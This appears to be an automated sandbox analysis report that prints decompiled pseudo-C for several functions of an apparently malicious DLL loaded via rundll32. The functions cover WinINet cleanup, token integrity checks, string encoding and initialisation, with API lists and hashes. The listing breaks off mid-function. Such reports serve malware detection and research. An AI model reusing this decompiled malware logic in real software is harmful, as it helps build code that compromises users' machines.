Part of subcall function 02E3452E: lstrcpy.KERNEL32(00000000,00000000), ref: 02E345A8

SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02E33897,00000000,?), ref: 02E32CD8

Strings

@MqtNqt, xrefs: 02E32C79

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
String ID: @MqtNqt
API String ID: 3739416942-2883916605
Opcode ID: 8e29c73f1683de015feaca9400eeb98cad9bbb998353bbcbbad5ffa68b354e9a
Instruction ID: e3ae39a4fed707849a974dcc20dc5e9a8614bf31e305a4669b07c2fe7d0a3ab8
Opcode Fuzzy Hash: 8e29c73f1683de015feaca9400eeb98cad9bbb998353bbcbbad5ffa68b354e9a
Instruction Fuzzy Hash: F401A231180201ABD7326B61DD4CF9B76B9BF8436BF109B25FA91A10E0D730E854DA60

Uniqueness

Uniqueness Score: -1.00%

Function 02E370E7 Relevance: 12.1, APIs: 8, Instructions: 75
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E02E370E7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E02E32129(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					FindCloseChangeNotification(_t20); // executed
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E02E3789E(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E02E3789E(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E02E3789E(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E02E3789E(_t46);
				}
				return _t24;
			}

0x02e370e7
0x02e370e7
0x02e370e9
0x02e370eb
0x02e370f2
0x02e370f9
0x02e370f9
0x02e370fe
0x02e37101
0x02e37108
0x02e37111
0x02e37115
0x02e3711a
0x02e3711a
0x02e3711c
0x02e37121
0x02e37125
0x02e3712a
0x02e3712a
0x02e3712c
0x02e37131
0x02e37135
0x02e3713a
0x02e3713a
0x02e3713c
0x02e37147
0x02e3714a
0x02e3714a
0x02e3714c
0x02e37151
0x02e37154
0x02e37154
0x02e37156
0x02e3715d
0x02e37160
0x02e37165
0x02e37168
0x02e37168
0x02e3716b
0x02e37170
0x02e37173
0x02e37173
0x02e37178
0x02e3717c
0x02e3717f
0x02e3717f
0x02e37184
0x02e37189
0x00000000
0x02e3718c
0x02e37193

APIs

InternetSetStatusCallback.WININET(?,00000000), ref: 02E37115
InternetCloseHandle.WININET(?), ref: 02E3711A
InternetSetStatusCallback.WININET(?,00000000), ref: 02E37125
InternetCloseHandle.WININET(?), ref: 02E3712A
InternetSetStatusCallback.WININET(?,00000000), ref: 02E37135
InternetCloseHandle.WININET(?), ref: 02E3713A
FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,02E35DA7,?,?,747581D0,00000000,00000000), ref: 02E3714A
CloseHandle.KERNEL32(?,00000000,00000102,?,?,02E35DA7,?,?,747581D0,00000000,00000000), ref: 02E37154

Part of subcall function 02E32129: WaitForMultipleObjects.KERNEL32(00000002,02E37C1D,00000000,02E37C1D,?,?,?,02E37C1D,0000EA60), ref: 02E32144

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
String ID:
API String ID: 2172891992-0
Opcode ID: 588cdc77e7d5fd6d40802ff2d693ed9ae9b10bde1b0de2b15588e5966239b181
Instruction ID: f365ffaf86625ead0f08bdab37e82d838399e58bc38e41f825bcb99739ec2e35
Opcode Fuzzy Hash: 588cdc77e7d5fd6d40802ff2d693ed9ae9b10bde1b0de2b15588e5966239b181
Instruction Fuzzy Hash: DE1130B76806485BC531AEAADC88C1BF7EEAF4520A3555D18F085D3515C730FC84CA60

Uniqueness

Uniqueness Score: -1.00%

Function 02E3578B Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E02E3578B(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x2e3a2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E02E37A71(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E02E3789E(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x02e35798
0x02e3579f
0x02e357a6
0x02e357ba
0x02e357c5
0x02e357dd
0x02e357ea
0x02e357ed
0x02e357f2
0x02e357fd
0x02e35801
0x02e35810
0x02e35814
0x02e35830
0x02e35830
0x02e35834
0x02e35834
0x02e35839
0x02e3583d
0x02e35843
0x02e35844
0x02e3584b
0x02e35851

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02E357BD
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02E357DD
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02E357ED
CloseHandle.KERNEL32(00000000), ref: 02E3583D

Part of subcall function 02E37A71: RtlAllocateHeap.NTDLL(00000000,00000000,02E34DB1), ref: 02E37A7D

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02E35810
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02E35818
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02E35828

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 9e5e87dd80a98296e80ed7003de046889794492cdb02da38b31801ee0697c3af
Instruction ID: c8267645e7ef8fc13e7e37a4e47506d0befe0a10fce98e3759793bbd559bf1fe
Opcode Fuzzy Hash: 9e5e87dd80a98296e80ed7003de046889794492cdb02da38b31801ee0697c3af
Instruction Fuzzy Hash: D8214AB598020DBFEB019F91DD88EEEBBB9EF08309F5040B5E910A6261D7718A94DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02E32281 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E02E32281(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x2e3a348; // 0x206d5a8
				_t1 = _t9 + 0x2e3b624; // 0x253d7325
				_t36 = 0;
				_t28 = E02E36779(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x4ea9601
					_t40 = E02E37A71(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E02E344D8(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E02E3789E(_t40);
						_t42 = E02E317F0(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E02E3789E(_t36);
							_t36 = _t42;
						}
						_t43 = E02E35454(_t36, _t33);
						if(_t43 != 0) {
							E02E3789E(_t36);
							_t36 = _t43;
						}
					}
					E02E3789E(_t28);
				}
				return _t36;
			}

0x02e32281
0x02e32284
0x02e32285
0x02e3228c
0x02e32293
0x02e3229a
0x02e3229e
0x02e322a5
0x02e322ac
0x02e322b1
0x02e322b9
0x02e322c3
0x02e322c7
0x02e322cb
0x02e322d1
0x02e322d6
0x02e322e0
0x02e322e6
0x02e322e8
0x02e322ff
0x02e32303
0x02e32306
0x02e3230b
0x02e3230b
0x02e32314
0x02e32318
0x02e3231b
0x02e32320
0x02e32320
0x02e32318
0x02e32323
0x02e32328
0x02e3232e

APIs

Part of subcall function 02E36779: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02E3229A,253D7325,00000000,00000000,?,775EC740,02E33831), ref: 02E367E0
Part of subcall function 02E36779: sprintf.NTDLL ref: 02E36801

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,02E33831,00000000,04EA9600), ref: 02E322AC
lstrlen.KERNEL32(00000000,?,775EC740,02E33831,00000000,04EA9600), ref: 02E322B4

Part of subcall function 02E37A71: RtlAllocateHeap.NTDLL(00000000,00000000,02E34DB1), ref: 02E37A7D

strcpy.NTDLL ref: 02E322CB
lstrcat.KERNEL32(00000000,00000000), ref: 02E322D6

Part of subcall function 02E344D8: lstrlen.KERNEL32(00000000,00000000,02E33831,00000000,?,02E322E5,00000000,02E33831,?,775EC740,02E33831,00000000,04EA9600), ref: 02E344E9

Part of subcall function 02E3789E: RtlFreeHeap.NTDLL(00000000,00000000,02E34E3E,00000000,?,00000000,00000000), ref: 02E378AA

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02E33831,?,775EC740,02E33831,00000000,04EA9600), ref: 02E322F3

Part of subcall function 02E317F0: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,02E322FF,00000000,?,775EC740,02E33831,00000000,04EA9600), ref: 02E317FA
Part of subcall function 02E317F0: _snprintf.NTDLL ref: 02E31858

Strings

=, xrefs: 02E322ED

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: fbf6030d86e7dd7b79b053f70450b52cd6b9d6000f2c2281b563385bd915aa8d
Instruction ID: 67078eef2635ccc0d567a6e85f7f6832bb39a7ff4ab79aa8a22eaea9c622dd2d
Opcode Fuzzy Hash: fbf6030d86e7dd7b79b053f70450b52cd6b9d6000f2c2281b563385bd915aa8d
Instruction Fuzzy Hash: E811E37398122967871377B99C8CC7F7AAE8F8A7563159055FA04AB201CB74CD01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E33D80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E02E33D80(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x2e3a3cc; // 0x4ea9600
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x2e3a3cc; // 0x4ea9600
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x2e3a030) {
					HeapFree( *0x2e3a2d8, 0, _t8);
				}
				_t9 = E02E34076(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x2e3a3cc; // 0x4ea9600
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x02e33d80
0x02e33d80
0x02e33d89
0x02e33d99
0x02e33d99
0x02e33d9e
0x02e33da3
0x00000000
0x00000000
0x02e33d93
0x02e33d93
0x02e33da5
0x02e33da9
0x02e33dbb
0x02e33dbb
0x02e33dc6
0x02e33dcb
0x02e33dce
0x02e33dd3
0x02e33dd7
0x02e33ddd

APIs

RtlEnterCriticalSection.NTDLL(04EA95C0), ref: 02E33D89
Sleep.KERNEL32(0000000A), ref: 02E33D93
HeapFree.KERNEL32(00000000,00000000), ref: 02E33DBB
RtlLeaveCriticalSection.NTDLL(04EA95C0), ref: 02E33DD7

Strings

Uqt, xrefs: 02E33DBB

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uqt
API String ID: 58946197-2320327147
Opcode ID: 7dc978b83418a3ef1475ad21b460dec054a26c8007ca7272333d04a1a7a3eb1f
Instruction ID: e5c8cdf86d9f151d556e49b1dbb41d8538c10fd136ee6991a580ac42eeb620e4
Opcode Fuzzy Hash: 7dc978b83418a3ef1475ad21b460dec054a26c8007ca7272333d04a1a7a3eb1f
Instruction Fuzzy Hash: 17F0FE70AC02459BD7119F66DD4CF1A3BE5AB01747B84D864F586C72A1C770D8E0CF55

Uniqueness

Uniqueness Score: -1.00%

Function 02E310AD Relevance: 7.7, APIs: 5, Instructions: 161
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E02E310AD(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				intOrPtr _t32;
				void* _t33;
				CHAR* _t37;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t45;
				void* _t50;
				void* _t52;
				signed char _t57;
				intOrPtr _t59;
				signed int _t60;
				void* _t64;
				CHAR* _t68;
				CHAR* _t69;
				char* _t70;
				void* _t71;

				_t62 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E02E339E3();
				if(_t21 != 0) {
					_t60 =  *0x2e3a2fc; // 0x4000000a
					_t56 = (_t60 & 0xf0000000) + _t21;
					 *0x2e3a2fc = (_t60 & 0xf0000000) + _t21;
				}
				_t22 =  *0x2e3a178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E02E340F0( &_v8,  &_v20); // executed
					_t55 = _t25;
					_t26 =  *0x2e3a348; // 0x206d5a8
					if( *0x2e3a2fc > 5) {
						_t8 = _t26 + 0x2e3b5c5; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x2e3b9ef; // 0x44283a44
						_t27 = _t7;
					}
					E02E365DB(_t27, _t27);
					_t31 = E02E360A1(_t62,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t64 = 5;
					if(_t55 != _t64) {
						_t32 = E02E31F1D();
						 *0x2e3a310 =  *0x2e3a310 ^ 0x81bbe65d;
						 *0x2e3a36c = _t32;
						_t33 = E02E37A71(0x60);
						 *0x2e3a3cc = _t33;
						__eflags = _t33;
						if(_t33 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t33, 0, 0x60);
							_t50 =  *0x2e3a3cc; // 0x4ea9600
							_t71 = _t71 + 0xc;
							__imp__(_t50 + 0x40);
							_t52 =  *0x2e3a3cc; // 0x4ea9600
							 *_t52 = 0x2e3b827;
						}
						_t55 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t37 = RtlAllocateHeap( *0x2e3a2d8, 0, 0x43);
							 *0x2e3a368 = _t37;
							__eflags = _t37;
							if(_t37 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t57 =  *0x2e3a2fc; // 0x4000000a
								_t62 = _t57 & 0x000000ff;
								_t59 =  *0x2e3a348; // 0x206d5a8
								_t13 = _t59 + 0x2e3b552; // 0x697a6f4d
								_t56 = _t13;
								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x2e3927b);
							}
							_t55 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E02E354EC( ~_v8 &  *0x2e3a310,  &E02E3A00C); // executed
								_t43 = E02E32792(0, _t56, _t64,  &E02E3A00C); // executed
								_t55 = _t43;
								__eflags = _t55;
								if(_t55 != 0) {
									goto L30;
								}
								_t44 = E02E368F8(); // executed
								__eflags = _t44;
								if(_t44 != 0) {
									__eflags = _v8;
									_t68 = _v12;
									if(_v8 != 0) {
										L29:
										_t45 = E02E3517A(_t62, _t68, _v8); // executed
										_t55 = _t45;
										goto L30;
									}
									__eflags = _t68;
									if(__eflags == 0) {
										goto L30;
									}
									_t55 = E02E34F6E(__eflags,  &(_t68[4]));
									__eflags = _t55;
									if(_t55 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t55 = 8;
							}
						}
					} else {
						_t69 = _v12;
						if(_t69 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x2e3a17c();
							}
							goto L34;
						}
						_t70 =  &(_t69[4]);
						do {
						} while (E02E35854(_t64, _t70, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t55 = _t22;
					L34:
					return _t55;
				}
			}

0x02e310ad
0x02e310b7
0x02e310ba
0x02e310bd
0x02e310c0
0x02e310c7
0x02e310c9
0x02e310d5
0x02e310d7
0x02e310d7
0x02e310e0
0x02e310e6
0x02e310eb
0x02e31105
0x02e31111
0x02e31113
0x02e31118
0x02e31122
0x02e31122
0x02e3111a
0x02e3111a
0x02e3111a
0x02e3111a
0x02e31129
0x02e31136
0x02e3113d
0x02e31142
0x02e31142
0x02e3114b
0x02e3114e
0x02e31174
0x02e31179
0x02e31185
0x02e3118a
0x02e3118f
0x02e31194
0x02e31196
0x02e311c2
0x02e311c4
0x02e31198
0x02e3119c
0x02e311a1
0x02e311a6
0x02e311ad
0x02e311b3
0x02e311b8
0x02e311be
0x02e311c5
0x02e311c7
0x02e311c9
0x02e311d8
0x02e311de
0x02e311e3
0x02e311e5
0x02e31215
0x02e31217
0x02e311e7
0x02e311e7
0x02e311ed
0x02e311fa
0x02e31200
0x02e31200
0x02e31208
0x02e31211
0x02e31218
0x02e3121a
0x02e3121c
0x02e31223
0x02e31230
0x02e31235
0x02e3123a
0x02e3123c
0x02e3123e
0x00000000
0x00000000
0x02e31240
0x02e31245
0x02e31247
0x02e3124e
0x02e31252
0x02e31255
0x02e3126a
0x02e3126e
0x02e31273
0x00000000
0x02e31273
0x02e31257
0x02e31259
0x00000000
0x00000000
0x02e31264
0x02e31266
0x02e31268
0x00000000
0x00000000
0x00000000
0x02e31268
0x02e3124b
0x02e3124b
0x02e3121c
0x02e31150
0x02e31150
0x02e31155
0x02e31275
0x02e3127a
0x02e31282
0x02e31282
0x00000000
0x02e3127a
0x02e3115b
0x02e3115e
0x02e31168
0x02e3116f
0x00000000
0x02e3128a
0x02e3128a
0x02e3128d
0x02e31291
0x02e31291

APIs

Part of subcall function 02E339E3: GetModuleHandleA.KERNEL32(4C44544E,00000000,02E310C5,00000001), ref: 02E339F2

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02E31142

Part of subcall function 02E31F1D: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 02E31F41
Part of subcall function 02E31F1D: wsprintfA.USER32 ref: 02E31FA5

Part of subcall function 02E37A71: RtlAllocateHeap.NTDLL(00000000,00000000,02E34DB1), ref: 02E37A7D

memset.NTDLL ref: 02E3119C
RtlInitializeCriticalSection.NTDLL(04EA95C0), ref: 02E311AD

Part of subcall function 02E34F6E: memset.NTDLL ref: 02E34F88
Part of subcall function 02E34F6E: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02E34FCE
Part of subcall function 02E34F6E: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 02E34FD9

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02E311D8
wsprintfA.USER32 ref: 02E31208

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
String ID:
API String ID: 1825273115-0
Opcode ID: 83d5880359f28fb535b753b05c076ad3cc882b4878b45328d8781bc3c59ccfc1
Instruction ID: 56a052f0fc9abbca343e3c2ddc983e1797458ccaa326d09a6c38b61e1cb7040c
Opcode Fuzzy Hash: 83d5880359f28fb535b753b05c076ad3cc882b4878b45328d8781bc3c59ccfc1
Instruction Fuzzy Hash: F751D571EC0218ABDB129BA1DC8CBAE73A8BB0870BF50E839E549DB241D77195D0CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02E33EE9 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E02E33EE9(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E02E37A71(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E02E3789E(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E02E37A71((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x2e3a318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x02e33ef0
0x02e33ef7
0x02e33efc
0x02e33eff
0x02e33f06
0x02e33f09
0x02e33f0c
0x02e33f11
0x02e33f16
0x02e3406a
0x02e3406c
0x02e3406e
0x02e34073
0x02e34073
0x02e33f1c
0x02e33f1f
0x02e33f22
0x02e33f24
0x02e33f24
0x02e33f28
0x00000000
0x00000000
0x02e33f2c
0x02e33f58
0x02e33f5d
0x02e33f5f
0x02e33f5f
0x02e33f62
0x02e33f65
0x02e33f65
0x02e33f67
0x00000000
0x02e33f32
0x02e33f34
0x02e33f53
0x02e33f53
0x02e33f6a
0x02e33f6a
0x02e33f6b
0x02e33f6b
0x02e33f6e
0x00000000
0x00000000
0x00000000
0x02e33f6e
0x02e33f38
0x02e33f7f
0x02e33f83
0x02e3405d
0x02e3405f
0x02e3405f
0x02e34060
0x02e34063
0x00000000
0x02e34063
0x02e33f8c
0x02e33f9d
0x02e33fa1
0x02e34059
0x00000000
0x02e34059
